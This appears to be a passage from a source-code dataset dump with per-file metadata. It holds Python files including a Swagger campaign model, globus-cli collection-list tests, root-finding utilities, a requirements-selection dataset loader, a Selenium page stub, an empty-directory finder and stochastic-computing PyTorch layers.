return self._emails_sent
@emails_sent.setter
def emails_sent(self, emails_sent):
"""Sets the emails_sent of this Campaign.
The total number of emails sent for this campaign. # noqa: E501
:param emails_sent: The emails_sent of this Campaign. # noqa: E501
:type: int
"""
self._emails_sent = emails_sent
@property
def send_time(self):
"""Gets the send_time of this Campaign. # noqa: E501
The date and time a campaign was sent. # noqa: E501
:return: The send_time of this Campaign. # noqa: E501
:rtype: datetime
"""
return self._send_time
@send_time.setter
def send_time(self, send_time):
"""Sets the send_time of this Campaign.
The date and time a campaign was sent. # noqa: E501
:param send_time: The send_time of this Campaign. # noqa: E501
:type: datetime
"""
self._send_time = send_time
@property
def content_type(self):
"""Gets the content_type of this Campaign. # noqa: E501
How the campaign's content is put together. # noqa: E501
:return: The content_type of this Campaign. # noqa: E501
:rtype: str
"""
return self._content_type
@content_type.setter
def content_type(self, content_type):
"""Sets the content_type of this Campaign.
How the campaign's content is put together. # noqa: E501
:param content_type: The content_type of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["template", "html", "url", "multichannel"] # noqa: E501
if content_type not in allowed_values:
raise ValueError(
"Invalid value for `content_type` ({0}), must be one of {1}" # noqa: E501
.format(content_type, allowed_values)
)
self._content_type = content_type
@property
def needs_block_refresh(self):
"""Gets the needs_block_refresh of this Campaign. # noqa: E501
Determines if the campaign needs its blocks refreshed by opening the web-based campaign editor. Deprecated and will always return false. # noqa: E501
:return: The needs_block_refresh of this Campaign. # noqa: E501
:rtype: bool
"""
return self._needs_block_refresh
@needs_block_refresh.setter
def needs_block_refresh(self, needs_block_refresh):
"""Sets the needs_block_refresh of this Campaign.
Determines if the campaign needs its blocks refreshed by opening the web-based campaign editor. Deprecated and will always return false. # noqa: E501
:param needs_block_refresh: The needs_block_refresh of this Campaign. # noqa: E501
:type: bool
"""
self._needs_block_refresh = needs_block_refresh
@property
def resendable(self):
"""Gets the resendable of this Campaign. # noqa: E501
Determines if the campaign qualifies to be resent to non-openers. # noqa: E501
:return: The resendable of this Campaign. # noqa: E501
:rtype: bool
"""
return self._resendable
@resendable.setter
def resendable(self, resendable):
"""Sets the resendable of this Campaign.
Determines if the campaign qualifies to be resent to non-openers. # noqa: E501
:param resendable: The resendable of this Campaign. # noqa: E501
:type: bool
"""
self._resendable = resendable
@property
def recipients(self):
"""Gets the recipients of this Campaign. # noqa: E501
:return: The recipients of this Campaign. # noqa: E501
:rtype: List3
"""
return self._recipients
@recipients.setter
def recipients(self, recipients):
"""Sets the recipients of this Campaign.
:param recipients: The recipients of this Campaign. # noqa: E501
:type: List3
"""
self._recipients = recipients
@property
def settings(self):
"""Gets the settings of this Campaign. # noqa: E501
:return: The settings of this Campaign. # noqa: E501
:rtype: CampaignSettings2
"""
return self._settings
@settings.setter
def settings(self, settings):
"""Sets the settings of this Campaign.
:param settings: The settings of this Campaign. # noqa: E501
:type: CampaignSettings2
"""
self._settings = settings
@property
def variate_settings(self):
"""Gets the variate_settings of this Campaign. # noqa: E501
:return: The variate_settings of this Campaign. # noqa: E501
:rtype: ABTestOptions
"""
return self._variate_settings
@variate_settings.setter
def variate_settings(self, variate_settings):
"""Sets the variate_settings of this Campaign.
:param variate_settings: The variate_settings of this Campaign. # noqa: E501
:type: ABTestOptions
"""
self._variate_settings = variate_settings
@property
def tracking(self):
"""Gets the tracking of this Campaign. # noqa: E501
:return: The tracking of this Campaign. # noqa: E501
:rtype: CampaignTrackingOptions1
"""
return self._tracking
@tracking.setter
def tracking(self, tracking):
"""Sets the tracking of this Campaign.
:param tracking: The tracking of this Campaign. # noqa: E501
:type: CampaignTrackingOptions1
"""
self._tracking = tracking
@property
def rss_opts(self):
"""Gets the rss_opts of this Campaign. # noqa: E501
:return: The rss_opts of this Campaign. # noqa: E501
:rtype: RSSOptions
"""
return self._rss_opts
@rss_opts.setter
def rss_opts(self, rss_opts):
"""Sets the rss_opts of this Campaign.
:param rss_opts: The rss_opts of this Campaign. # noqa: E501
:type: RSSOptions
"""
self._rss_opts = rss_opts
@property
def ab_split_opts(self):
"""Gets the ab_split_opts of this Campaign. # noqa: E501
:return: The ab_split_opts of this Campaign. # noqa: E501
:rtype: ABTestingOptions
"""
return self._ab_split_opts
@ab_split_opts.setter
def ab_split_opts(self, ab_split_opts):
"""Sets the ab_split_opts of this Campaign.
:param ab_split_opts: The ab_split_opts of this Campaign. # noqa: E501
:type: ABTestingOptions
"""
self._ab_split_opts = ab_split_opts
@property
def social_card(self):
"""Gets the social_card of this Campaign. # noqa: E501
:return: The social_card of this Campaign. # noqa: E501
:rtype: CampaignSocialCard
"""
return self._social_card
@social_card.setter
def social_card(self, social_card):
"""Sets the social_card of this Campaign.
:param social_card: The social_card of this Campaign. # noqa: E501
:type: CampaignSocialCard
"""
self._social_card = social_card
@property
def report_summary(self):
"""Gets the report_summary of this Campaign. # noqa: E501
:return: The report_summary of this Campaign. # noqa: E501
:rtype: CampaignReportSummary2
"""
return self._report_summary
@report_summary.setter
def report_summary(self, report_summary):
"""Sets the report_summary of this Campaign.
:param report_summary: The report_summary of this Campaign. # noqa: E501
:type: CampaignReportSummary2
"""
self._report_summary = report_summary
@property
def delivery_status(self):
"""Gets the delivery_status of this Campaign. # noqa: E501
:return: The delivery_status of this Campaign. # noqa: E501
:rtype: CampaignDeliveryStatus
"""
return self._delivery_status
@delivery_status.setter
def delivery_status(self, delivery_status):
"""Sets the delivery_status of this Campaign.
:param delivery_status: The delivery_status of this Campaign. # noqa: E501
:type: CampaignDeliveryStatus
"""
self._delivery_status = delivery_status
@property
def links(self):
"""Gets the links of this Campaign. # noqa: E501
A list of link types and descriptions for the API schema documents. # noqa: E501
:return: The links of this Campaign. # noqa: E501
:rtype: list[ResourceLink]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this Campaign.
A list of link types and descriptions for the API schema documents. # noqa: E501
:param links: The links of this Campaign. # noqa: E501
:type: list[ResourceLink]
"""
self._links = links
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Campaign, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Campaign):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0
| 0
| 0
|
ccc90d9c929391cae107a2a233df254df0e9c438
| 2,937
|
py
|
Python
|
tests/functional/collection/test_collection_list.py
|
globusonline/globus-cli
|
696857baafac198141edc3c1c29c72215f217df1
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/collection/test_collection_list.py
|
globusonline/globus-cli
|
696857baafac198141edc3c1c29c72215f217df1
|
[
"Apache-2.0"
] | 1
|
2016-04-09T17:26:05.000Z
|
2016-04-11T16:13:50.000Z
|
tests/functional/collection/test_collection_list.py
|
globusonline/globus-cli
|
696857baafac198141edc3c1c29c72215f217df1
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import responses
from globus_sdk._testing import load_response_set
@pytest.mark.parametrize(
"filter_val",
[
"mapped_collections",
"mapped-collections",
"MaPpeD-cOLlectiOns",
"guest-collections",
"guest_Collections",
["Mapped-Collections", "Managed_by-me"],
["mapped-collections", "managed-by_me", "created-by-me"],
],
)
| 39.16
| 88
| 0.709227
|
import pytest
import responses
from globus_sdk._testing import load_response_set
def test_collection_list(run_line, add_gcs_login):
meta = load_response_set("cli.collection_operations").metadata
epid = meta["endpoint_id"]
add_gcs_login(epid)
result = run_line(f"globus collection list {epid}")
collection_names = ["Happy Fun Collection Name 1", "Happy Fun Collection Name 2"]
for name in collection_names:
assert name in result.stdout
def test_collection_list_opts(run_line, add_gcs_login):
meta = load_response_set("cli.collection_operations").metadata
epid = meta["endpoint_id"]
add_gcs_login(epid)
cid = meta["mapped_collection_id"]
run_line(f"globus collection list --mapped-collection-id {cid} {epid}")
assert responses.calls[-1].request.params["mapped_collection_id"] == cid
run_line(f"globus collection list --include-private-policies {epid}")
assert responses.calls[-1].request.params["include"] == "private_policies"
def test_collection_list_on_gcp(run_line):
meta = load_response_set("cli.collection_operations").metadata
epid = meta["gcp_endpoint_id"]
result = run_line(f"globus collection list {epid}", assert_exit_code=3)
assert "success" not in result.output
assert (
f"Expected {epid} to be a Globus Connect Server v5 Endpoint.\n"
"Instead, found it was of type 'Globus Connect Personal'."
) in result.stderr
assert "This operation is not supported on objects of this type." in result.stderr
def test_collection_list_on_mapped_collection(run_line):
meta = load_response_set("cli.collection_operations").metadata
epid = meta["mapped_collection_id"]
result = run_line(f"globus collection list {epid}", assert_exit_code=3)
assert "success" not in result.output
assert (
f"Expected {epid} to be a Globus Connect Server v5 Endpoint.\n"
"Instead, found it was of type 'Mapped Collection'."
) in result.stderr
assert "This operation is not supported on objects of this type." in result.stderr
@pytest.mark.parametrize(
"filter_val",
[
"mapped_collections",
"mapped-collections",
"MaPpeD-cOLlectiOns",
"guest-collections",
"guest_Collections",
["Mapped-Collections", "Managed_by-me"],
["mapped-collections", "managed-by_me", "created-by-me"],
],
)
def test_collection_list_filters(run_line, add_gcs_login, filter_val):
meta = load_response_set("cli.collection_operations").metadata
epid = meta["endpoint_id"]
add_gcs_login(epid)
if not isinstance(filter_val, list):
filter_val = [filter_val]
filter_str = " ".join(f"--filter {f}" for f in filter_val)
run_line(f"globus collection list {filter_str} {epid}")
filter_params = {v.lower().replace("-", "_") for v in filter_val}
assert set(responses.calls[-1].request.params["filter"].split(",")) == filter_params
| 2,414
| 0
| 114
|
93b134cbc992e9743aaef355e11e242ce5dafd4f
| 4,389
|
py
|
Python
|
bicks/mathtool.py
|
balabalabalalaba/testb
|
fd2a8262bba94c561be49d69120401f0d7259fdf
|
[
"MIT"
] | null | null | null |
bicks/mathtool.py
|
balabalabalalaba/testb
|
fd2a8262bba94c561be49d69120401f0d7259fdf
|
[
"MIT"
] | null | null | null |
bicks/mathtool.py
|
balabalabalalaba/testb
|
fd2a8262bba94c561be49d69120401f0d7259fdf
|
[
"MIT"
] | 3
|
2021-07-28T09:51:58.000Z
|
2021-07-30T16:37:26.000Z
|
import numpy as np
def dichotomy(f, a, b, epsilon=1.0e-5):
"""Tradional dichotomy to find a root of a function
"""
fa = f(a)
while True:
c = (a + b) / 2.0
if (b - a) <= epsilon:
return c
fc = f(c)
if fc * fa < 0:
b = c
else:
fa = fc
a = c
def find_n_roots(f, n, deltax, eps=1.0e-10):
"""
Warning! Don't make the deltax = 0.1
"""
currentroot = 0
root = []
gox = 1.0e-5
b = f(gox)
while currentroot < n:
a = b
b = f(gox)
if (a * b) < 0:
root.append(dichotomy(f, gox - deltax, gox, epsilon=eps))
currentroot = currentroot + 1
gox = gox + deltax
return root
| 25.369942
| 92
| 0.437229
|
import numpy as np
def dichotomy(f, a, b, epsilon=1.0e-5):
"""Tradional dichotomy to find a root of a function
"""
fa = f(a)
while True:
c = (a + b) / 2.0
if (b - a) <= epsilon:
return c
fc = f(c)
if fc * fa < 0:
b = c
else:
fa = fc
a = c
def find_n_roots(f, n, deltax, eps=1.0e-10):
"""
Warning! Don't make the deltax = 0.1
"""
currentroot = 0
root = []
gox = 1.0e-5
b = f(gox)
while currentroot < n:
a = b
b = f(gox)
if (a * b) < 0:
root.append(dichotomy(f, gox - deltax, gox, epsilon=eps))
currentroot = currentroot + 1
gox = gox + deltax
return root
def find_real_roots(f, endkz, startkz=0, deltakz=0.12, eps=1.0e-10):
root = []
kz = startkz
b = f(kz)
while kz < endkz:
a = b
b = f(kz)
if (a * b) < 0:
root.append(dichotomy(f, kz - deltakz, kz, epsilon=eps))
kz = kz + deltakz
return root
def find_proj_roots(f, endk0, startk0 = 0.121, deltak0 = 0.12, eps=1.0e-10):
root = []
k0 = startk0
b = f(k0)
while k0 < endk0:
a = b
b = f(k0)
if (a * b) < 0:
root.append(dichotomy(f, k0 - deltak0, k0, epsilon=eps))
k0 = k0 + deltak0
return root
def golden_section(f, a, b, epsilon=1.0e-10):
c = a + 0.382 * (b - a)
d = a + 0.618 * (b - a)
while (b - a) > epsilon:
if (abs(f(c))) < (abs(f(d))):
a = c
c = d
d = a + 0.618 * (b - a)
else:
b = d
d = c
c = a + 0.382 * (b - a)
return (b + a) / 2
def find_n_roots_for_small_and_big_q(f, qa, n, gox=0, deltax=0.024, eps=1.0e-10, peak1 = 0):
currentroot = 0
root = []
@minus_cosqa(np.cos(qa))
def nf(x):
return f(x)
while currentroot < n:
if abs(nf(gox)) > 0.9:
a = gox
while abs(nf(gox)) > 0.9:
gox = gox + deltax
b = gox
peak2 = golden_section(nf, a, b, epsilon=eps)
if(f(peak1) * f(peak2)) <= eps:
mayberoot = dichotomy(f, peak1, peak2, epsilon=eps)
if abs(f(mayberoot)) <= eps:
root.append(mayberoot)
currentroot = currentroot + 1
peak1 = peak2
gox = gox + deltax
return root
def find_real_roots_for_small_and_big_q(f, qa, deltax=0.024, eps=1.0e-10):
root = []
gox = 0
peak1 = 0
@minus_cosqa(np.cos(qa))
def nf(x):
return f(x)
absnf = abs(nf(gox))
while True:
if absnf > 0.9:
a = gox
while absnf > 0.9:
gox = gox + deltax
absnf = abs(nf(gox))
if absnf > 1.0e3:
peak2 = gox
if(f(peak1) * f(peak2)) <= 1.0e-8:
root.append(dichotomy(f, peak1, peak2, epsilon=eps))
return root
b = gox
peak2 = golden_section(nf, a, b, epsilon=eps)
if(f(peak1) * f(peak2)) <= 1.0e-8:
mayberoot = dichotomy(f, peak1, peak2, epsilon=eps)
root.append(mayberoot)
peak1 = peak2
gox = gox + deltax
absnf = abs(nf(gox))
def minus_cosqa(x):
def minus(f):
def wrapper(*args, **kargs):
return f(*args, **kargs) - x
return wrapper
return minus
def find_all_peaks(f, x_start, x_end, deltax=0.01, eps=1.0e-3, lastdata=[]):
x = x_start
peaks = []
if len(lastdata):
a = 1
while x < x_end:
if f(x) > 0.8:
a = x
while f(x) > 0.8:
x = x + deltax
if x >= x_end:
break
b = x
peak = golden_section(f, a, b, epsilon=eps)
fp = f(peak)
if 0.99 < fp < 1.01:
peaks.append(peak)
x = x + deltax
return peaks
def secant(f, a, b, eps=1.0e-5):
fa = f(a)
fb = f(b)
c = b - ((b - a) / (fb - fa)) * fb
while True:
if abs(b - a)<eps:
return c
else:
c = b - ((b - a) / (fb - fa)) * f(b)
a = b
b = c
fa = fb
fb = f(b)
| 3,446
| 0
| 184
|
48736beda7d4c0758982c5077f882eea08929d77
| 5,342
|
py
|
Python
|
datasets/Dataset.py
|
UCLM-SIMD/MONRP
|
16b19ace0746365300b5d3d16f5dda8c3a196cf7
|
[
"MIT"
] | null | null | null |
datasets/Dataset.py
|
UCLM-SIMD/MONRP
|
16b19ace0746365300b5d3d16f5dda8c3a196cf7
|
[
"MIT"
] | null | null | null |
datasets/Dataset.py
|
UCLM-SIMD/MONRP
|
16b19ace0746365300b5d3d16f5dda8c3a196cf7
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from typing import Dict
import numpy as np
import json
import uuid
class Dataset:
"""
Class used to load datasets as published in
del Sagrado, José del Águila, Isabel M. Orellana, Francisco J.
Multi-objective ant colony optimization for requirements selection.
Empirical Software Engineering. Vol. 20(3). 2015.
"""
def __init__(self, dataset: str = "test", source_file: str = None, source_dict: Dict = None):
"""Loads dataset vectors depending on the dataset name.
"""
if source_file:
with open(source_file) as json_file:
# use filename as dataset id
self.id = Path(source_file).stem
json_data = json.load(json_file)
self.load_from_dict(json_data)
elif source_dict:
self.id = uuid.uuid4().hex
self.load_from_dict(source_dict)
else: # if not source file->search dataset json in datasets folder
self.id = dataset
with open("datasets/"+dataset+".json") as json_file:
json_data = json.load(json_file)
self.load_from_dict(json_data)
# normalize values calculating scaled satisfactions, costs and scores
self.normalize()
# simplify dependencies:
if self.dependencies is not None:
self.list_of_sons = self.dependencies.copy() # needed in feda_algorithm.py
self.calculate_dependencies()
def calculate_dependencies(self) -> None:
"""Given the list of dependencies, recursively stores dependencies of requirements,
saving in each requirements index all the requirements that have to be included to satisfy the dependency restrictions.
"""
self.new_dependencies = {}
# dependency = index_dependency+1 (starts from 1)
for dep in range(len(self.dependencies)):
if self.dependencies[dep] is not None:
# if req has dependencies -> add them and launch aux fun
for dep2 in self.dependencies[dep]:
self.new_dependencies.setdefault(dep, []).append(dep2)
self.aux_dependencies(dep, dep2)
# store new dependencies non repeatedly:
self.dependencies = np.empty(len(self.dependencies), dtype=object)
for i in range(len(self.dependencies)):
if i not in self.new_dependencies:
self.dependencies[i] = None
else:
self.dependencies[i] = list(
dict.fromkeys(self.new_dependencies[i]))
def normalize(self) -> None:
"""Given the costs, importances and priorities, this method calculates the total satisfaction and score, and scales cost and
satisfaction using min-max normalization
"""
num_pbis = len(self.pbis_cost)
self.pbis_satisfaction = self.stakeholders_importances.dot(
self.stakeholders_pbis_priorities)
# now two escalation follows, based on
# https://en.wikipedia.org/wiki/Feature_scaling#Rescaling_(min-max_normalization)
# scale pbis cost in range [0-1]
margin = 1 / num_pbis # used to avoid zeros
diff = np.sum(self.pbis_cost) - np.min(self.pbis_cost)
self.pbis_cost_scaled = (self.pbis_cost - np.min(self.pbis_cost) +
margin) / (diff + margin)
# scale pbis satisfaction in range[0-1]
diff = np.sum(self.pbis_satisfaction) - np.min(self.pbis_satisfaction)
self.pbis_satisfaction_scaled = (
self.pbis_satisfaction - np.min(self.pbis_satisfaction) + margin) / (diff + margin)
# each pbi score is computed from the scaled versions of pbi satisfaction and cost
self.pbis_score = self.pbis_satisfaction_scaled / self.pbis_cost_scaled
| 44.890756
| 132
| 0.629539
|
from pathlib import Path
from typing import Dict
import numpy as np
import json
import uuid
class Dataset:
"""
Class used to load datasets as published in
del Sagrado, José del Águila, Isabel M. Orellana, Francisco J.
Multi-objective ant colony optimization for requirements selection.
Empirical Software Engineering. Vol. 20(3). 2015.
"""
def __init__(self, dataset: str = "test", source_file: str = None, source_dict: Dict = None):
"""Loads dataset vectors depending on the dataset name.
"""
if source_file:
with open(source_file) as json_file:
# use filename as dataset id
self.id = Path(source_file).stem
json_data = json.load(json_file)
self.load_from_dict(json_data)
elif source_dict:
self.id = uuid.uuid4().hex
self.load_from_dict(source_dict)
else: # if not source file->search dataset json in datasets folder
self.id = dataset
with open("datasets/"+dataset+".json") as json_file:
json_data = json.load(json_file)
self.load_from_dict(json_data)
# normalize values calculating scaled satisfactions, costs and scores
self.normalize()
# simplify dependencies:
if self.dependencies is not None:
self.list_of_sons = self.dependencies.copy() # needed in feda_algorithm.py
self.calculate_dependencies()
def load_from_dict(self, source_dict: Dict) -> None:
self.pbis_cost = np.array(source_dict["pbis_cost"]).astype(int)
self.num_pbis = len(self.pbis_cost)
self.stakeholders_importances = np.array(
source_dict["stakeholders_importances"]).astype(int)
self.stakeholders_pbis_priorities = np.array(
source_dict["stakeholders_pbis_priorities"]).astype(int)
if "dependencies" in source_dict:
self.dependencies = np.array(
source_dict["dependencies"], dtype=object)
for x in range(len(self.dependencies)):
if self.dependencies[x] is None:
continue
for y in range(len(self.dependencies[x])):
self.dependencies[x][y] = int(self.dependencies[x][y])
else:
self.dependencies = None
def calculate_dependencies(self) -> None:
"""Given the list of dependencies, recursively stores dependencies of requirements,
saving in each requirements index all the requirements that have to be included to satisfy the dependency restrictions.
"""
self.new_dependencies = {}
# dependency = index_dependency+1 (starts from 1)
for dep in range(len(self.dependencies)):
if self.dependencies[dep] is not None:
# if req has dependencies -> add them and launch aux fun
for dep2 in self.dependencies[dep]:
self.new_dependencies.setdefault(dep, []).append(dep2)
self.aux_dependencies(dep, dep2)
# store new dependencies non repeatedly:
self.dependencies = np.empty(len(self.dependencies), dtype=object)
for i in range(len(self.dependencies)):
if i not in self.new_dependencies:
self.dependencies[i] = None
else:
self.dependencies[i] = list(
dict.fromkeys(self.new_dependencies[i]))
def aux_dependencies(self, parent: int, child: int) -> None:
# if no dependencies in child -> stop
if self.dependencies[child] is None:
return
# for each dependency in child -> if it is already the parent or contained in parent -> stop
for d in self.dependencies[child]:
if (d == parent) or (d in self.new_dependencies[parent]):
continue
# if not -> add new dependency to parent list and recursively launch aux fun
self.new_dependencies.setdefault(parent, []).append(d)
self.aux_dependencies(parent, d)
def normalize(self) -> None:
"""Given the costs, importances and priorities, this method calculates the total satisfaction and score, and scales cost and
satisfaction using min-max normalization
"""
num_pbis = len(self.pbis_cost)
self.pbis_satisfaction = self.stakeholders_importances.dot(
self.stakeholders_pbis_priorities)
# now two escalation follows, based on
# https://en.wikipedia.org/wiki/Feature_scaling#Rescaling_(min-max_normalization)
# scale pbis cost in range [0-1]
margin = 1 / num_pbis # used to avoid zeros
diff = np.sum(self.pbis_cost) - np.min(self.pbis_cost)
self.pbis_cost_scaled = (self.pbis_cost - np.min(self.pbis_cost) +
margin) / (diff + margin)
# scale pbis satisfaction in range[0-1]
diff = np.sum(self.pbis_satisfaction) - np.min(self.pbis_satisfaction)
self.pbis_satisfaction_scaled = (
self.pbis_satisfaction - np.min(self.pbis_satisfaction) + margin) / (diff + margin)
# each pbi score is computed from the scaled versions of pbi satisfaction and cost
self.pbis_score = self.pbis_satisfaction_scaled / self.pbis_cost_scaled
| 1,433
| 0
| 54
|
3792bb295ce140fd83de2476bc2ef2dd61c51b3c
| 798
|
py
|
Python
|
04_Selenium/exercices/framework/pages/homePage.py
|
twiindan/selenium_lessons
|
798557e8f584f9e6655414c13f232017483f0439
|
[
"Apache-2.0"
] | null | null | null |
04_Selenium/exercices/framework/pages/homePage.py
|
twiindan/selenium_lessons
|
798557e8f584f9e6655414c13f232017483f0439
|
[
"Apache-2.0"
] | null | null | null |
04_Selenium/exercices/framework/pages/homePage.py
|
twiindan/selenium_lessons
|
798557e8f584f9e6655414c13f232017483f0439
|
[
"Apache-2.0"
] | 1
|
2020-07-16T09:49:47.000Z
|
2020-07-16T09:49:47.000Z
|
from exercices.solutions.framework.core.base import BasePage
from exercices.solutions.framework.pages.newUserPage import newUserPage
| 24.9375
| 71
| 0.709273
|
from exercices.solutions.framework.core.base import BasePage
from exercices.solutions.framework.pages.newUserPage import newUserPage
class homePage(BasePage):
url = 'https://forum-testing.herokuapp.com/v1.0/'
_newUserLink = None
_listUserLink = None
_newForumMessageLink = None
_listForumLink = None
# Locate all the elements of the Home Page
def locate_elements(self):
pass
# Navigate to the new user page
def navigate_new_user_page(self):
pass
# Navigate to the new forum message page
def navigate_new_forum_message_page(self):
pass
# Navigate to the user list
def navigate_user_list_page(self):
pass
# Navigate to the forum message list
def navigate_forum_messages_list_page(self):
pass
| 139
| 501
| 23
|
6bfaf0bbaf4dbb45c5506ffcaa6481da16b4e9c0
| 48
|
py
|
Python
|
adet/utils/__init__.py
|
gist-ailab/uoais
|
fb42d9a96cd54daad61c956d8d9d65dd0ebef4c7
|
[
"BSD-2-Clause"
] | 52
|
2021-09-26T05:06:01.000Z
|
2022-03-27T07:48:19.000Z
|
adet/utils/__init__.py
|
gist-ailab/uoais
|
fb42d9a96cd54daad61c956d8d9d65dd0ebef4c7
|
[
"BSD-2-Clause"
] | 5
|
2021-10-12T00:39:45.000Z
|
2022-03-24T08:59:57.000Z
|
adet/utils/__init__.py
|
gist-ailab/uoais
|
fb42d9a96cd54daad61c956d8d9d65dd0ebef4c7
|
[
"BSD-2-Clause"
] | 9
|
2021-09-27T11:59:31.000Z
|
2022-03-23T07:49:15.000Z
|
# from .post_process import detector_postprocess
| 48
| 48
| 0.875
|
# from .post_process import detector_postprocess
| 0
| 0
| 0
|
3e641f99e90f1c6c1550d7bfd5ada58210b9afba
| 586
|
py
|
Python
|
src/directory.py
|
emptyfolderfinder/emptyfolderfinder-py
|
6c6dbbb204fa9c0b8db318f5b7d001d0b5d791e3
|
[
"MIT"
] | null | null | null |
src/directory.py
|
emptyfolderfinder/emptyfolderfinder-py
|
6c6dbbb204fa9c0b8db318f5b7d001d0b5d791e3
|
[
"MIT"
] | null | null | null |
src/directory.py
|
emptyfolderfinder/emptyfolderfinder-py
|
6c6dbbb204fa9c0b8db318f5b7d001d0b5d791e3
|
[
"MIT"
] | null | null | null |
import os
from pathlib import Path
| 20.206897
| 54
| 0.622867
|
import os
from pathlib import Path
def check_directory(path):
result = []
empty_dirs = []
p = Path(path)
dirs = [x for x in p.iterdir() if x.is_dir()]
files = [x for x in p.iterdir() if not x.is_dir()]
if len(files) == 0 and len(dirs) == 0:
result.append(path)
return result
for dir in dirs:
empty_dirs = check_directory(dir.as_posix())
result = result + empty_dirs
if len(empty_dirs) == len(dirs) and len(files) == 0:
result.append(path)
return result
def delete_directories(dirs):
for dir in dirs:
os.rmdir(dir)
| 505
| 0
| 46
|
c9865590a677790e0075a322e7d3bd02271fcc17
| 3,828
|
py
|
Python
|
utils_class.py
|
nanocad-lab/geo
|
2eb324b07c7c92b84a123f3a158723a2e3a77730
|
[
"MIT"
] | 1
|
2021-09-19T14:32:21.000Z
|
2021-09-19T14:32:21.000Z
|
utils_class.py
|
nanocad-lab/geo
|
2eb324b07c7c92b84a123f3a158723a2e3a77730
|
[
"MIT"
] | null | null | null |
utils_class.py
|
nanocad-lab/geo
|
2eb324b07c7c92b84a123f3a158723a2e3a77730
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils_functional
'''
Custom layers for SC
'''
class Conv2d_Add_Partial(nn.Conv2d):
'''
SC Conv2d using partial binary add
'''
def forward(self, input, prec=7, err=7, forward='1d_bin', generator='lfsr', z_unit=8, legacy=False, load_unit=8, load_wait_w=2, load_wait_a=2):
'''
Arguments:
prec: weight and activation precision to quantize to
err: stream length in the form of 2**err
forward: sc compute. Specifically how accumulation is done
generator: stream generator
z_unit: number of input channles to sum using OR accumulation when forward==yz_bin
legacy: disable accelerated kernels
load_unit: number of bits to load each time for progressive loading
load_wait_w: number of cycles to wait between loading weights for progressive loading
load_wait_a: number of cycles to wait between loading activations for progressive loading
'''
input.data = utils_functional.quantize(input.data, prec=prec)
self.weight.data = utils_functional.quantize(self.weight_org, prec=prec)
out = utils_functional.conv2d_generic(input, self.weight, bit_length=2**err, padding=self.padding, stride=self.stride, forward=forward, generator=generator, legacy=legacy, z_unit=z_unit, load_unit=load_unit, load_wait_w=load_wait_w, load_wait_a=load_wait_a)
return out
class BatchNorm2d_fixed(nn.BatchNorm2d):
'''
Quantized 2d batchnorm
'''
class BatchNorm1d_fixed(nn.BatchNorm1d):
'''
Quantized 1d batchnorm
'''
| 41.16129
| 265
| 0.637147
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils_functional
'''
Custom layers for SC
'''
class Conv2d_Add_Partial(nn.Conv2d):
'''
SC Conv2d using partial binary add
'''
def __init__(self, *kargs, **kwargs):
super(Conv2d_Add_Partial, self).__init__(*kargs, **kwargs)
self.register_buffer('weight_org', self.weight.data.clone())
def forward(self, input, prec=7, err=7, forward='1d_bin', generator='lfsr', z_unit=8, legacy=False, load_unit=8, load_wait_w=2, load_wait_a=2):
'''
Arguments:
prec: weight and activation precision to quantize to
err: stream length in the form of 2**err
forward: sc compute. Specifically how accumulation is done
generator: stream generator
z_unit: number of input channles to sum using OR accumulation when forward==yz_bin
legacy: disable accelerated kernels
load_unit: number of bits to load each time for progressive loading
load_wait_w: number of cycles to wait between loading weights for progressive loading
load_wait_a: number of cycles to wait between loading activations for progressive loading
'''
input.data = utils_functional.quantize(input.data, prec=prec)
self.weight.data = utils_functional.quantize(self.weight_org, prec=prec)
out = utils_functional.conv2d_generic(input, self.weight, bit_length=2**err, padding=self.padding, stride=self.stride, forward=forward, generator=generator, legacy=legacy, z_unit=z_unit, load_unit=load_unit, load_wait_w=load_wait_w, load_wait_a=load_wait_a)
return out
class BatchNorm2d_fixed(nn.BatchNorm2d):
'''
Quantized 2d batchnorm
'''
def __init__(self, *kargs, **kwargs):
super(BatchNorm2d_fixed, self).__init__(*kargs, **kwargs)
self.register_buffer('scale', None)
def forward(self, x):
out = F.batch_norm(x, self.running_mean, self.running_var, self.weight, self.bias, training=self.training)
if self.training:
mean = x.mean(dim=(0,2,3))
var = x.var(dim=(0,2,3), unbiased=False)
else:
mean = self.running_mean
var = self.running_var
if self.affine:
weight = self.weight.data
bias = self.bias.data
else:
weight = 1
bias = 0
w_n = weight/torch.sqrt(var + self.eps)
b_n = bias - mean*weight/torch.sqrt(var + self.eps)
w_n, self.scale = utils_functional.quantize_shift(w_n.detach())
b_n, _ = utils_functional.quantize_shift(b_n.detach(), self.scale)
w_n = w_n.reshape(w_n.size(0),1,1)
b_n = b_n.reshape(b_n.size(0),1,1)
out.data = (x.data*w_n + b_n).to(out.dtype)
return out
class BatchNorm1d_fixed(nn.BatchNorm1d):
'''
Quantized 1d batchnorm
'''
def __init__(self, *kargs, **kwargs):
super(BatchNorm1d_fixed, self).__init__(*kargs, **kwargs)
self.register_buffer('scale', None)
def forward(self, x):
out = F.batch_norm(x, self.running_mean, self.running_var, self.weight, self.bias, training=self.training)
if self.training:
mean = x.mean(dim=(0))
var = x.var(dim=(0), unbiased=False)
else:
mean = self.running_mean
var = self.running_var
if self.affine:
weight = self.weight.data
bias = self.bias.data
else:
weight = 1
bias = 0
w_n = weight/torch.sqrt(var + self.eps)
b_n = bias - mean*weight/torch.sqrt(var + self.eps)
w_n, self.scale = utils_functional.quantize_shift(w_n)
